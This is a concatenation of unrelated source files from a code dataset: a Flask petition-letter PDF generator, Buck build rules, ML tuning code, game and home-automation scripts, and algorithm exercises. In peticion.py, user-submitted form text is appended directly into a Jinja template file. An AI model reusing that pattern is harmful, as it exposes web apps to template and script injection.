\"\"\")\r\n modHTML.close()\r\n\r\n peticionAdd = request.form.get('peticiones')\r\n \r\n fecha_peticion = request.form.get('fecha_peticion')\r\n print(fecha_peticion)\r\n asunto_peticion = request.form.get('asunto_peticion')\r\n ciudad_peticion = request.form.get('ciudad_peticion')\r\n\r\n nom_peticionario = request.form.get('nom_peticionario').upper()\r\n \r\n id_peticionario = request.form.get('id_peticionario')\r\n ced_peticionario = request.form.get('ced_peticionario').replace('.','').replace(\",\",\"\")\r\n id_expedicion = request.form.get('id_expedicion')\r\n direccion_peticionario = request.form.get('direccion_peticionario') \r\n email_peticionario = request.form.get('email_peticionario')\r\n\r\n gen_peticionario = request.form.get('gen_peticionario')\r\n gen_peticionario = 'o' if gen_peticionario == 'm' else 'a'\r\n\r\n id_calidad = request.form.get('id_calidad')\r\n\r\n representada = request.form.get('representada')\r\n dirigido = request.form.get('dirigido')\r\n\r\n direccion_peticionado = request.form.get('direccion_peticionado') \r\n email_peticionado = request.form.get('email_peticionado')\r\n\r\n hechos_peticion = request.form.get('hechosAdd')\r\n\r\n \r\n\r\n derechoPeticion = f\"\"\"{ciudad_peticion} {fecha_peticion} \r\n \r\nSeñores. \r\n{dirigido} \r\n{direccion_peticionado} \r\n{email_peticionado} \r\n \r\nReferencia: Derecho de Petición de {nom_peticionario} a {dirigido} para {asunto_peticion} \r\n \r\n{nom_peticionario}, identificad{gen_peticionario} con {id_peticionario} número {ced_peticionario} de {id_expedicion}, en calidad de {id_calidad}; de conformidad con el artículo 23 de la Constitución Política de Colombia de 1991, y del título segundo de la parte primera del Código de Procedimiento Administrativo y de lo Contencioso Administrativo (Ley 1437 de 2011); interpongo el siguiente Derecho de Petición basado en los siguientes: \r\n \r\n\r\nI) Hechos. \r\n \r\n{hechos_peticion} \r\n \r\n\r\nII) Petición. \r\n\r\nEn mérito de lo expuesto, se solicita a {dirigido} que: \r\nPetición \r\n{peticionAdd} \r\n \r\nIII) Notificaciones. \r\n \r\nSe podrá notificar en cualquiera de las siguientes direcciones. \r\n \r\n{direccion_peticionario} \r\n \r\n{email_peticionario} \r\n \r\n \r\nIV) Firma. \r\n \r\nEl presente documento se suscribe de conformidad con el artículo 7 de la Ley 527 de 1999, y con la presunción contemplada en el artículo 244 de la Ley 1564 de 2012 (Código General del Proceso). \r\n\r\n \r\n\r\nSin otro particular, \r\n\r\n{nom_peticionario} \r\n{id_peticionario} número {ced_peticionario}\"\"\"\r\n\r\n\r\n\r\n class MyFPDF(FPDF, HTMLMixin):\r\n pass\r\n\r\n pdf = MyFPDF()\r\n pdf.set_margins(left= 15.0, top=12.5, right=15.0)\r\n pdf.add_page()\r\n pdf.write_html(derechoPeticion)\r\n pdf.output('peticion_'+nom_peticionario[:4]+ced_peticionario[:-3]+'.pdf', 'F')\r\n\r\n \r\n modHTML = open(\"./templates/form_peticion.html\",\"a\")\r\n modHTML.write (derechoPeticion)\r\n modHTML.write(\"\"\"\r\n \r\n\r\n {%endblock%}\"\"\")\r\n modHTML.close()\r\n\r\n return(nom_peticionario, ced_peticionario, derechoPeticion)\r\n\r\n","sub_path":"peticion.py","file_name":"peticion.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"506102196","text":"\"\"\"\nWe want to be able to use packages of files, fetched from an external data\nstore, for in-repo builds. Conceptually, this is pretty simple:\n - The repo stores an address and a cryptographic hash of the package.\n - There's a build target that fetches the package, checks the hash, and\n presents the package contents as an `image.layer`.\n\nThe above process is repo-hermetic (unless the package is unavailable), and\nlets repo builds use pre-built artifacts. Such artifacts bring two benefits:\n - Speed: we can explicitly cache large, infrequently changed artifacts.\n - Controlled API churn: I may want to use a \"stable\" version of my\n dependency, rather than whatever I might build off trunk.\n\nThe details of \"how to fetch a package\" will vary depending on the package\nstore. This is abstracted by `_PackageFetcherInfo` below.\n\nThe glue code in this file specifies a uniform way of exposing package\nstores as Buck targets. Its opinions are, roughly:\n\n - The data store has many versions of the package, each one immutable.\n New versions keep getting added. However, a repo checkout may only\n access some fixed versions of a package via \"tags\". Each (package, tag)\n pair results in a completely repo-deterministic `image.layer`.\n\n - In the repo, a (package, tag) pair is an `image.layer` target in a\n centralized repo location.\n\n - The layer's mount info has a correctly populated `runtime_source`, so if\n another layer mounts it at build-time, then this mount can be replicated\n at runtime.\n\n - Two representations are provided for the in-repo package database:\n performant `.bzl` and merge-conflict-free \"json dir\".\n\nMost users should use the performant `.bzl` database format, as follows:\n\n # pkg/pkg.bzl\n def _fetched_layer(name, tag = \"stable\"):\n return \"//pkg/db:\" + name + \"/\" + tag + \"-USE-pkg.fetched_layer\"\n pkg = struct(fetched_layer = _fetched_layer)\n\n # pkg/db/db.bzl\n package_db = {\"package\": {\"tag\": {\"address\": ..., \"hash\", ...}}\n\n # pkg/db/TARGETS\n load(\":db.bzl\", \"package_db\")\n fetched_package_layers_from_db(\n fetcher = {\n \"extra_deps\": [\"`image.source` \"generator\" to download package\"],\n \"fetch_package\": \"writes `tarball`/`install_files` JSON to stdout\",\n \"print_mount_config\": \"adds package address to `runtime_source`\",\n },\n package_db = package_db,\n target_suffix = \"-USE-pkg.fetched_layer\",\n )\n\nNow you can refer to a stable version of a package, represented as an\n`image.layer`, via `pkg.fetched_layer(\"name\")`.\n\n## When to use the \"json dir\" DB format?\n\nWith a `.bzl` database, the expected use-case is that there is a single,\ncentralized automation that synchronizes the in-repo package-tag map with\nthe external source of truth for packages and their tags.\n\nIf you expect some packages to be updated by other, independent automations,\nthen it is no longer a good idea to store all packages in a single file --\nmerge conflicts will cause all these automations to break.\n\nThe \"json dir\" DB format is free of merge conflicts, so long as\neach package-tag pair is only update by one automation.\n\nTo get the best of both worlds, use this pattern:\n - All \"normal\" packages are stored in a `.bzl` database and have one\n automation to update all packages in bulk.\n - Special packages (fewer in quantity) live in a \"json dir\" database.\n\"\"\"\n\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@bazel_skylib//lib:shell.bzl\", 
\"shell\")\nload(\"@bazel_skylib//lib:types.bzl\", \"types\")\nload(\"//fs_image/bzl:oss_shim.bzl\", \"buck_genrule\", \"get_visibility\")\nload(\"//fs_image/bzl/image_actions:feature.bzl\", \"private_do_not_use_feature_json_genrule\")\nload(\":image_layer.bzl\", \"image_layer\")\nload(\":target_tagger.bzl\", \"normalize_target\")\n\n_PackageFetcherInfo = provider(fields = [\n # This executable target prints a feature JSON responsible for\n # configuring the entire layer to represent the fetched package,\n # including file data, owner, mode, etc.\n #\n # See each fetcher's in-source docblock for the details of its contract.\n \"fetch_package\",\n # The executable target `fetch_package` may reference other targets\n # (usually tagged via __BUCK_TARGET or similar) in their features. Any\n # such target must ALSO be manually added to `extra_deps` so that\n # `image_layer.bzl` can resolve those dependencies correctly.\n \"extra_deps\",\n # An executable target that defines `runtime_source` and\n # `default_mountpoint` for the `mount_config` of the package layer.\n \"print_mount_config\",\n])\n\n# Read the doc-block for the purpose and high-level usage.\ndef fetched_package_layers_from_bzl_db(\n # `{\"package\": {\"tag\": }}` -- you would normally get\n # this by `load`ing a autogenerated `db.bzl` exporting just 1 dict.\n package_db,\n # Dict of `_PackageFetcherInfo` kwargs\n fetcher,\n # Layer targets will have the form `/`.\n # See `def _fetched_layer` in the docblock for the intended usage.\n target_suffix,\n visibility = None):\n for package, tags in package_db.items():\n for tag, how_to_fetch in tags.items():\n _fetched_package_layer(\n name = package + \"/\" + tag + target_suffix,\n package = package,\n how_to_fetch = how_to_fetch,\n fetcher = fetcher,\n visibility = visibility,\n )\n\n# Read the doc-block for the purpose and high-level usage.\ndef fetched_package_layers_from_json_dir_db(\n # Path to a database directory inside the current project (i.e.\n # relative to the parent of your TARGETS file).\n package_db_dir,\n # Dict of `_PackageFetcherInfo` kwargs\n fetcher,\n # Layer targets will have the form `/`.\n # See `def _fetched_layer` in the docblock for the intended usage.\n target_suffix,\n visibility = None):\n # Normalizing lets us treat `package_dir_db` as a prefix. It also\n # avoids triggering a bug in Buck, causing it to silently abort when a\n # glob pattern starts with `./`.\n package_db_prefix = paths.normalize(package_db_dir) + \"/\"\n suffix = \".json\"\n for p in native.glob([package_db_prefix + \"*/*\" + suffix]):\n if not p.startswith(package_db_prefix) or not p.endswith(suffix):\n fail(\"Bug: {} was not {}*/*{}\".format(p, package_db_prefix, suffix))\n package, tag = p[len(package_db_prefix):-len(suffix)].split(\"/\")\n export_file(name = p)\n _fetched_package_layer(\n name = package + \"/\" + tag + target_suffix,\n package = package,\n how_to_fetch = \":\" + p,\n fetcher = fetcher,\n visibility = visibility,\n )\n\n# Instead of using this stand-alone, use `fetched_package_layers_from_db` to\n# define packages uniformly in one project. 
This ensures each package is\n# only fetched once.\ndef _fetched_package_layer(\n name,\n package,\n # One of two options:\n # - A JSONable dict describing how to fetch the package instance.\n # - A string path to a target whose output has a comment on the\n # first line, and JSON on subsequent lines.\n how_to_fetch,\n # Dict of `_PackageFetcherInfo` fields, documented above.\n fetcher,\n visibility = None):\n fetcher = _PackageFetcherInfo(**fetcher)\n visibility = get_visibility(visibility, name)\n if types.is_dict(how_to_fetch):\n print_how_to_fetch_json = \"echo \" + shell.quote(\n struct(**how_to_fetch).to_json(),\n )\n elif types.is_string(how_to_fetch):\n print_how_to_fetch_json = \"tail -n +3 $(location {})\".format(\n how_to_fetch,\n )\n else:\n fail(\"`how_to_fetch` must be str/dict, not {}\".format(how_to_fetch))\n\n package_feature = name + \"-fetched-package-feature\"\n private_do_not_use_feature_json_genrule(\n name = package_feature,\n deps = [\n # We want to re-fetch packages if the fetching mechanics change.\n # `def fake_macro_library` has more details.\n \"//fs_image/bzl:fetched_package_layer\",\n ] + fetcher.extra_deps,\n output_feature_cmd = \"\"\"\n {print_how_to_fetch_json} |\n $(exe {fetch_package}) {quoted_package} {quoted_target} > \"$OUT\"\n \"\"\".format(\n fetch_package = fetcher.fetch_package,\n quoted_package = shell.quote(package),\n quoted_target = shell.quote(normalize_target(\":\" + name)),\n print_how_to_fetch_json = print_how_to_fetch_json,\n ),\n visibility = visibility,\n )\n\n mount_config = name + \"-fetched-package-mount-config\"\n buck_genrule(\n name = mount_config,\n out = \"partial_mountconfig.json\", # It lacks `build_source`, e.g.\n bash = '''\n {print_how_to_fetch_json} |\n $(exe {print_mount_config}) {quoted_package} > \"$OUT\"\n '''.format(\n print_mount_config = fetcher.print_mount_config,\n quoted_package = shell.quote(package),\n print_how_to_fetch_json = print_how_to_fetch_json,\n ),\n )\n\n image_layer(\n name = name,\n features = [\":\" + package_feature],\n mount_config = \":\" + mount_config,\n visibility = visibility,\n )\n","sub_path":"fs_image/bzl/fetched_package_layer.bzl","file_name":"fetched_package_layer.bzl","file_ext":"bzl","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"103563875","text":"import pygame as pg\nimport sys\nimport json\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"map\", type=str,\n help=\"Map to load, json file in map directory without extention Ex: blocks\")\nparser.add_argument(\"-ff\", \"--friendlyFire\", action=\"store_true\",\n help=\"Turn on friendly fire\")\nargs = parser.parse_args()\n\n\nwith open (f'maps/{args.map}.json') as f:\n data = json.load(f)\n\n\nMAP_WIDTH = data['width']\nMAP_HEIGHT = data['height']\nscreen = pg.display.set_mode((MAP_WIDTH, MAP_HEIGHT))\nMAP_BACKGROUND = data['background']\nobstacles = data['obstacles']\nplayers = data['players']\nscoreboard = data['scoreboard']\n\nTANK_SIZE = (50, 50)\nTANK_MAX_SPEED = 4\nTANK_MAX_ROTATION = 7\nTANK_FONT = 'Times New Roman'\nTANK_FONT_SIZE = 32\nSELECTED_COLOR = (0,234,0)\nFPS = 30\nSELECT_ADD_TIME = 500 # milliseconds\nBACKGROUND_COLOR = (59, 113, 55)\nBACKGROUND_SIZE = 120 # must be square\nFLAG_SIZE = 25\nFRIENDLY_FIRE = args.friendlyFire\nBULLET_SIZE = 6\nBULLET_SPEED = 10\nRESPAWN_TIME = 5000\nPOINTS_CARRYING_FLAG = 1\nPOINTS_RETURNING_FLAG = 100\nONE_SECOND = 1000\nAI_UPDATE_TIMEOUT = 333 # lower is more frequent","sub_path":"gameConsts.py","file_name":"gameConsts.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"525937670","text":"import numpy as np\nimport xgboost as xgb\nfrom sklearn.metrics import make_scorer\nimport hyperopt\nfrom hyperopt import fmin, tpe, hp, Trials, STATUS_OK, STATUS_FAIL\nfrom functools import partial\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import TimeSeriesSplit, train_test_split, cross_val_score, KFold, cross_validate\n\ndef fit_xgb(params, X_train, y_train, seed=42):\n n_estimators = int(params[\"n_estimators\"])\n max_depth= int(params[\"max_depth\"])\n\n try:\n model = xgb.XGBRegressor(n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=params[\"learning_rate\"],\n subsample=params[\"subsample\"], \n seed=seed)\n \n result = model.fit(X_train,\n y_train.values.ravel(),\n eval_set=[(X_train, y_train.values.ravel())],\n early_stopping_rounds=50,\n verbose=False)\n\n return {\n \"status\": STATUS_OK,\n \"models\": [model]\n }\n\n except ValueError as ex:\n return {\n \"error\": ex,\n \"status\": STATUS_FAIL\n }\n\ndef train_xgb(params, X_train, y_train, cv, scorer='neg_mean_squared_error', seed=42):\n \"\"\"\n Train XGBoost regressor using the parameters given as input. The model\n is validated using standard cross validation technique adapted for time series\n data. This function returns a friendly output for the hyperopt parameter optimization\n module.\n\n Parameters\n ----------\n params: dict with the parameters of the XGBoost regressor. For complete list see:\n https://xgboost.readthedocs.io/en/latest/parameter.html\n X_train: pd.DataFrame with the training set features\n y_train: pd.Series with the training set targets\n\n Returns\n -------\n dict with keys 'model' for the trained model, \n 'status' containing the hyperopt,\n status string,\n and 'loss' with the RMSE obtained from cross-validation\n \"\"\"\n\n n_estimators = int(params[\"n_estimators\"])\n max_depth= int(params[\"max_depth\"])\n\n try:\n model = xgb.XGBRegressor(n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=params[\"learning_rate\"],\n subsample=params[\"subsample\"], \n seed=seed)\n\n \n #result = model.fit(X_train,\n # y_train.values.ravel(),\n # eval_set=[(X_train, y_train.values.ravel())],\n # early_stopping_rounds=50,\n # verbose=False)\n\n fit_params = {\n 'eval_set': [(X_train, y_train.values.ravel())],\n 'early_stopping_rounds': 50,\n 'verbose': False\n }\n\n return_estimator = False\n cv_score = cross_validate(\n model,\n X_train, y_train.values.ravel(),\n cv=cv,\n scoring=scorer,\n return_estimator=return_estimator,\n fit_params=fit_params\n )\n\n scores = np.abs(np.array(cv_score['test_score']))\n avg_score = np.mean(scores)\n return {\n \"loss\": avg_score,\n \"scores\": scores,\n \"status\": STATUS_OK,\n #\"models\": cv_score['estimator']\n }\n\n except ValueError as ex:\n return {\n \"error\": ex,\n \"status\": STATUS_FAIL\n }\n\ndef optimize_xgb(X_train, y_train, max_evals=10, cv=None, scorer='neg_mean_squared_error', seed=42):\n \"\"\"\n Run Bayesan optimization to find the optimal XGBoost algorithm\n hyperparameters.\n\n Parameters\n ----------\n X_train: pd.DataFrame with the training set features\n y_train: pd.Series with the training set targets\n max_evals: the maximum number of iterations in the Bayesian optimization method\n\n Returns\n -------\n best: dict with the best parameters obtained\n trials: a list of hyperopt Trials objects with the history of the optimization\n \"\"\"\n assert cv is not None\n\n space = {\n \"n_estimators\": hp.quniform(\"n_estimators\", 100, 1000, 10),\n 
\"max_depth\": hp.quniform(\"max_depth\", 1, 8, 1),\n \"learning_rate\": hp.loguniform(\"learning_rate\", -5, 1),\n \"subsample\": hp.uniform(\"subsample\", 0.8, 1),\n \"gamma\": hp.quniform(\"gamma\", 0, 100, 1)\n }\n\n objective_fn = partial(train_xgb,\n X_train=X_train, y_train=y_train, \n scorer=scorer, \n cv=cv,\n seed=seed)\n\n trials = Trials()\n best = fmin(fn=objective_fn,\n space=space,\n algo=tpe.suggest,\n max_evals=max_evals,\n trials=trials)\n\n # evaluate the best model on the test set\n return best, trials\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"122632343","text":"from coinbase_commerce.util import register_resource_cls\nfrom .base import (\n CreateAPIResource,\n DeleteAPIResource,\n ListAPIResource,\n UpdateAPIResource,\n)\n\n__all__ = (\n 'Checkout',\n)\n\n\n@register_resource_cls\nclass Checkout(ListAPIResource,\n CreateAPIResource,\n UpdateAPIResource,\n DeleteAPIResource):\n RESOURCE_PATH = \"checkouts\"\n RESOURCE_NAME = \"checkout_aio\"\n","sub_path":"coinbase_commerce/aio/api_resources/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"415124368","text":"import os\n\n\nclass doc(object):\n \"\"\"表示单个文档\"\"\"\n\n def __init__(self, doc_path, return_sents_list=False):\n self.doc_path = doc_path\n self.id_, _ = os.path.splitext(os.path.basename(doc_path))\n self.return_sents_list = return_sents_list\n\n with open(doc_path) as f:\n self._process_lines(f.readlines())\n\n def _process_lines(self, lines):\n highlight_count = 0\n sents = []\n for line in lines:\n if line.startswith(\"@highlight\"):\n highlight_count += 1\n elif line == \"\\n\":\n continue\n else:\n sents.append(line.strip('\\n').lower())\n if not self.return_sents_list:\n self.article = \" \".join(sents[:-highlight_count])\n self.abstract = \" \".join(sents[-highlight_count:])\n else:\n self.article = sents[:-highlight_count]\n self.abstract = sents[-highlight_count:]\n\n\n def out(self, tf_score):\n \"\"\"打印出摘要 以及id\"\"\"\n print(\"ID: \", self.id_)\n print(\"SCORE: \", tf_score)\n print(\"*\"*25 + '\\n' + self.abstract + '\\n' + \"*\"*25)\n print('\\n\\n')\n","sub_path":"Doc.py","file_name":"Doc.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"69268321","text":"import sys\nimport os\nimport time\n\nimport pinger\nimport sun\n\nsys.path.insert(0, \"/home/uad/Programming/database-gspreadsheet/\")\nimport db_ev\n\n\ndef turn_on():\n\tos.system(\"k1\")\n\tdb_ev.write(\"k\",True)\n\ndef turn_off():\n\tos.system(\"k0\")\n\tdb_ev.write(\"k\",False)\n\n\nip = \"192.168.1.27\"\nyour_city = \"Ankara\"\n\n\n\nif(pinger.is_online(ip)):\n\tif(not(sun.is_shining(your_city))):\n\t\twhile(db_ev.read(\"is_at_home\") == \"0\"):\n\t\t\tprint(\"welcome home\")\n\t\t\tturn_on()\n\t\t\tdb_ev.write(\"is_at_home\",True)\n\telse:\n\t\tprint(\"shining\\nno need to turn on\")\n\t\t#turn_off()\nelse:\n\tprint(\"not at home\")\n\twhile(db_ev.read(\"is_at_home\") == \"1\"):\t\n\t\tprint(\"goodbye\")\t\n\t\tturn_off()\n\t\tdb_ev.write(\"is_at_home\",False)\n\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"400459531","text":"from game.deck import Deck\nfrom game.hand import Hand\nfrom game.table import Table\nfrom game.player import Player, STATUS_CODE\n\nclass Game:\n def __init__(self, *players): # players like this ([id, name], [id, name] , ...)\n self.deck = Deck()\n self.players = self.init_players(players)\n self.first = self.players[0] if self.players[0].status is 1 else self.players[1]\n self.table = Table([], [])\n\n def init_players(self, players):\n _r = []\n for player in players:\n hand = Hand(*self.deck.give(6))\n _id = player[0]\n name = player[1]\n _r.append(Player(_id, name, STATUS_CODE[0], hand))\n\n if _r[0].hand.small_trump is False and _r[1].hand.small_trump is False:\n self.deck = Deck()\n self.players = self.init_players(players)\n\n st = _r[0].hand.small_trump < _r[1].hand.small_trump\n _r[0].status = 1 if st else 0\n _r[1].status = 0 if st else 1\n\n return _r\n\n def move(self, player, card):\n self[player].hand -= card\n self.table += card\n\n def respond(self, player):\n _r = []\n for cs in self[player].hand:\n if cs.isstrong(self.table[-1]):\n _r.append(cs)\n return _r\n\n def take(self, player):\n self[player].hand.take(*self.table)\n self.table.flush()\n self[player].status = 2\n self[2 - (player + 1)].status = 1\n\n def give_from_deck(self, player):\n l = len(self[player].hand)\n if len(self.deck) > 6 - l:\n self[player].hand.take(*self.deck.give(6 - l))\n elif len(self.deck) < 6 - l and self.deck:\n self[player].hand.take(*self.deck.give(len(self.deck)))\n\n def game_end(self):\n l = len(self[0].hand) - len(self[1].hand)\n return 0 if l >= 0 else 1\n\n def __iter__(self):\n for i in self.players:\n yield i\n\n def __getitem__(self, key):\n return self.players[key]\n","sub_path":"game/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"321106879","text":"#!/usr/bin/env python3\n\"\"\"\nScript that creates a sample file\nto be used as input on run_setup of query_builder\n\"\"\"\nimport inspect\nimport json\nimport os\nimport time\nfrom collections import namedtuple\nfrom contextlib import contextmanager\nfrom datetime import datetime\n\nimport click\nimport timeout_decorator\nfrom colorama import init\n\nimport helpers\nfrom base import LOGGER\nfrom compute_handler import get_backend_service_id\nfrom kubernetes_handler import (\n delete_configmap,\n get_cluster_credentials,\n patch_deployment)\nfrom setup_iap import setup_iap\nfrom simulation_mode import simulation_wall\n\ninit()\n\n\n@click.command()\n@click.option('--input-file',\n help='Input file', required=True)\n@click.option('--simulation/--no-simulation',\n default=True,\n help='Simulate the execution. Do not execute any command.')\ndef run_query_builder_iap_setup(simulation, input_file):\n \"\"\" run query builder setup \"\"\"\n with simulation_wall(simulation):\n try:\n query_builder_input = parse_input_json(input_file)\n helpers_config(simulation)\n click.echo(\"Input file read from [{}]\".format(input_file))\n except FileNotFoundError as not_found:\n click.echo(\"File [{0}] not found.\".format(not_found.filename))\n except json.decoder.JSONDecodeError as err:\n click.echo(\"Error parsing file [{0}].\\n{1}\"\n .format(input_file, err))\n with instruction_separator(\"Cluster Credentials\"):\n get_cluster_credentials(\n query_builder_input.query_builder.project_id,\n query_builder_input.cluster.cluster_name,\n query_builder_input.query_builder.compute_zone\n )\n\n check_load_balancer(query_builder_input)\n\n with instruction_separator(\"IAP\", \"Turning on\"):\n delete_configmap(\"iap-config\")\n\n setup_iap(query_builder_input.query_builder.project_id,\n query_builder_input.oauth.client_id,\n query_builder_input.oauth.client_secret,\n query_builder_input.cluster.timeout)\n\n with instruction_separator(\"Frontend Deployment\", \"Patching\"):\n frontend_deployment = \"frontend\"\n path_value = '\"{\\\\\"spec\\\\\":{\\\\\"template\\\\\":{\\\\\"metadata\\\\\":{\\\\\"annotations\\\\\":{\\\\\"date\\\\\":\\\\\"'+ datetime.utcnow().strftime('%Y%m%d%H%M%S') + '\\\\\"}}}}}\"'\n patch_deployment(frontend_deployment, path_value)\n\n\n@contextmanager\ndef instruction_separator(step, action=\"Creating\"):\n \"\"\"Add a message at the start and end of the log messages of the step\"\"\"\n click.echo()\n click.secho('{:-^60}'.format((\"{} {}\".format(action, step))), bold=True)\n try:\n yield\n click.secho('{:-^60}'.format((\"{} finished successfully\".format(step))),\n fg='green')\n except StopIteration as err:\n LOGGER.exception(\"Timeout error\")\n click.secho('{:-^60}'.format((\"Timeout {} {}\".format(action, step))),\n err=True, fg='red')\n raise ValueError(str(err))\n except Exception: # pylint: disable=W0703\n LOGGER.exception(\"error\")\n click.secho('{:-^60}'.format((\"Problem {} {}\".format(action, step))),\n err=True, fg='red')\n\n\n@timeout_decorator.timeout(1800, timeout_exception=StopIteration)\ndef check_load_balancer(query_builder_input):\n \"\"\" \"\"\"\n with instruction_separator(\"Load Balancer\", \"Checking\"):\n backend_service = get_backend_service_id(\n query_builder_input.query_builder.project_id,\n \"frontend\"\n )\n while not backend_service:\n click.echo(\"Waiting for Load Balancer\")\n if backend_service == \"\":\n time.sleep(60)\n backend_service = get_backend_service_id(\n query_builder_input.query_builder.project_id,\n \"frontend\"\n 
)\n\n\ndef parse_input_json(input_file):\n \"\"\" Parse input json \"\"\"\n with open(input_file, 'r', encoding='utf-8') as infile:\n return json.loads(\n infile.read(),\n object_hook=lambda d: namedtuple('QB', d.keys())(*d.values())\n )\n\n\ndef helpers_config(simulation):\n \"\"\" setup helper variables \"\"\"\n helpers.START_TIME = datetime.utcnow().strftime('%Y%m%d%H%M')\n helpers.DRY_RUN = simulation\n helpers.BASE_DIR = os.path.join(os.path.dirname(\n os.path.abspath(inspect.stack()[0][1])))\n\n\nif __name__ == '__main__':\n run_query_builder_iap_setup() # pylint: disable=no-value-for-parameter\n","sub_path":"securitycenter/query-builder/setup/run_query_builder_iap_setup.py","file_name":"run_query_builder_iap_setup.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"563041147","text":"# Runs on Leetcode\n # Bruteforce \n # Runtime - O(nk) where k is number of lists and n is length of lists\n # Memory - O(1) - no extra space used\n \n # Optimized\n # Runtime - O(nlogk) n and k are same as above\n # Memory - O(1) excluding the resultant linked list space\n\n \n \n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\n\n# Bruteforce\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if not l1:\n return l2\n if not l2:\n return l1\n dummy = ListNode(float('-inf'))\n result = dummy\n while l1 and l2:\n if l1.val < l2.val:\n dummy.next = l1\n dummy = dummy.next\n l1 = l1.next\n dummy.next = None\n else:\n dummy.next = l2\n dummy = dummy.next\n l2 = l2.next\n dummy.next = None\n if l1:\n dummy.next = l1\n if l2:\n dummy.next = l2\n return result.next\n \n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n merged = ListNode(float('-inf'))\n result = merged\n if not lists:\n return merged.next\n i = 0\n while i < len(lists):\n if lists[i]:\n merged = self.mergeTwoLists(merged, lists[i])\n i += 1\n return result.next\n\n\n\n\n# Optimized\n\nclass Solution:\n import heapq\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n dummy = result = ListNode(float('-inf'))\n queue = []\n\n for i in range(len(lists)):\n if lists[i]:\n heapq.heappush(queue, (lists[i].val, i ,lists[i]))\n \n while queue:\n node_val, index, node = heapq.heappop(queue)\n dummy.next = ListNode(node_val)\n dummy = dummy.next\n node = node.next\n if node:\n heapq.heappush(queue, (node.val, index, node))\n return result.next\n","sub_path":"Merge_K_sorted_lists.py","file_name":"Merge_K_sorted_lists.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"506759017","text":"initialInvestment = float(input (\"How much are you going to invest\"))\r\nterm = float(input (\"How many years are you going to invest the money?\"))\r\ninterestRate = float(input (\"Input the annual interest rate as a decimal. {For 2% enter .02}\"))\r\n\r\nx = 1\r\nprint (\"Month\\tInterest Earned\\tTotal\")\r\nwhile x < (term*12+1):\r\n interestEarned = initialInvestment * (interestRate/12)\r\n initialInvestment = interestEarned + initialInvestment\r\n print (x , \"\\t\", \"$\", \"{:.2f}\".format(interestEarned)), \"\\t\", \"$\", \"{:.2f}\".format(initialInvestment)\r\n x = x + 1\r\n\r\n","sub_path":"compound.py","file_name":"compound.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"401199389","text":"from typing import Tuple\nfrom numpy.core.records import record\nimport jittor as jt\nfrom datasets.query_datasets import QueryDataset \nfrom datasets.shape_datasets import ShapeDataset\nimport tqdm\nimport jittor.transform as transform\nimport os\n# from tensorboardX import SummaryWriter\nimport warnings\nfrom utils import read_json\nfrom PIL import Image\nfrom RetrievalNet import RetrievalNet\nwarnings.filterwarnings('ignore')\nfrom Models import RetrievalNet\n\nimport numpy as np\nimport binvox_rw\nfrom sklearn.metrics.pairwise import pairwise_distances\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"3\"\n\nimport shutil\nfrom sklearn import manifold\nimport matplotlib.pyplot as plt\nimport time\n\n\n\nimport multiprocessing\nfrom contextlib import contextmanager\n\n\ndef averaged_hausdorff_distance(set1, set2, max_ahd=np.inf):\n \"\"\"\n Compute the Averaged Hausdorff Distance function\n between two unordered sets of points (the function is symmetric).\n Batches are not supported, so squeeze your inputs first!\n :param set1: Array/list where each row/element is an N-dimensional point.\n :param set2: Array/list where each row/element is an N-dimensional point.\n :param max_ahd: Maximum AHD possible to return if any set is empty. Default: inf.\n :return: The Averaged Hausdorff Distance between set1 and set2.\n\n from: https://github.com/HaipengXiong/weighted-hausdorff-loss/blob/master/object-locator/losses.py\n \"\"\"\n\n if len(set1) == 0 or len(set2) == 0:\n return max_ahd\n\n set1 = np.array(set1)\n set2 = np.array(set2)\n\n assert set1.ndim == 2, 'got %s' % set1.ndim\n assert set2.ndim == 2, 'got %s' % set2.ndim\n\n assert set1.shape[1] == set2.shape[1], \\\n 'The points in both sets must have the same number of dimensions, got %s and %s.'\\\n % (set2.shape[1], set2.shape[1])\n\n d2_matrix = pairwise_distances(set1, set2, metric='euclidean')\n\n res = np.average(np.min(d2_matrix, axis=0)) + \\\n np.average(np.min(d2_matrix, axis=1))\n\n return res/2\n\n\n\n\nclass Retrieval(object):\n '''\n ColorTransfer\n load\n save\n '''\n def __init__(self, config):\n self.cfg =config\n self.retrieval_net = 